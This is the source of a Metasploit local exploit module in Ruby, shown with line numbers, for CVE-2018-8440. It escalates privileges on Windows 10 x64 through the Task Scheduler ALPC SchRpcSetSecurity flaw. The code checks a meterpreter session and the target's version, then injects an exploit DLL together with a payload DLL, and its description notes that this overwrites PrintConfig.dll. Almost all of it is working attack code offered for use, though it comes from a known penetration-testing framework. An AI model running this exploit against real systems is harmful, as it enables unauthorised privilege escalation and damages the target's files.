1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = NormalRanking
8

9
  include Msf::Post::File
10
  include Msf::Exploit::EXE
11
  include Msf::Post::Windows::Priv
12
  include Msf::Post::Windows::Process
13
  include Msf::Post::Windows::ReflectiveDLLInjection
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
20
        'Description' => %q{
21
          On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented
22
          by the task scheduler service can be used to write arbitrary DACLs to `.job` files located
23
          in `c:\windows\tasks` because the scheduler does not use impersonation when checking this
24
          location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be
25
          created to a file the user has read access to. After creating a hardlink, the vulnerability
26
          can be triggered to set the DACL on the linked file.
27

28
          WARNING:
29
          The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
30
          will be overwritten when the exploit runs.
31

32
          This module has been tested against Windows 10 Pro x64.
33
        },
34
        'License' => MSF_LICENSE,
35
        'Author' => [
36
          'SandboxEscaper', # Original discovery and PoC
37
          'bwatters-r7',          # msf module
38
          'asoto-r7',             # msf module
39
          'Jacob Robles'          # msf module
40
        ],
41
        'Platform' => 'win',
42
        'SessionTypes' => ['meterpreter'],
43
        'Targets' => [
44
          ['Windows 10 x64', { 'Arch' => ARCH_X64 }]
45
        ],
46
        'References' => [
47
          ['CVE', '2018-8440'],
48
          ['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
49
        ],
50
        'Notes' => {
51
          # Exploit overwrites PrintConfig.dll, which makes it unusable.
52
          'Stability' => [ OS_RESOURCE_LOSS ],
53
          'Reliability' => [ REPEATABLE_SESSION ],
54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
55
        },
56
        'DisclosureDate' => '2018-08-27',
57
        'DefaultTarget' => 0
58
      )
59
    )
60
  end
61

62
  def validate_active_host
63
    sysinfo['Computer']
64
    true
65
  rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
66
    elog(e)
67
    false
68
  end
69

70
  def validate_target
71
    if is_system?
72
      fail_with(Failure::None, 'Session is already elevated')
73
    end
74

75
    if sysinfo['Architecture'] == ARCH_X86
76
      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
77
    end
78

79
    version = get_version_info
80
    if version.xp_or_2003? && version.workstation?
81
      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
82
    end
83
  end
84

85
  def exploit
86
    unless session.type == 'meterpreter'
87
      fail_with(Failure::None, 'Only meterpreter sessions are supported')
88
    end
89

90
    print_status('Checking target...')
91
    unless validate_active_host
92
      raise Msf::Exploit::Failed, 'Could not connect to session'
93
    end
94

95
    validate_target
96

97
    print_status('Target looks good... attempting the LPE exploit')
98
    execute_dll(
99
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll'),
100
      generate_payload_dll
101
    )
102
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
103
  rescue Rex::Post::Meterpreter::RequestError => e
104
    elog(e)
105
    print_error(e.message)
106
  end
107
end
108

109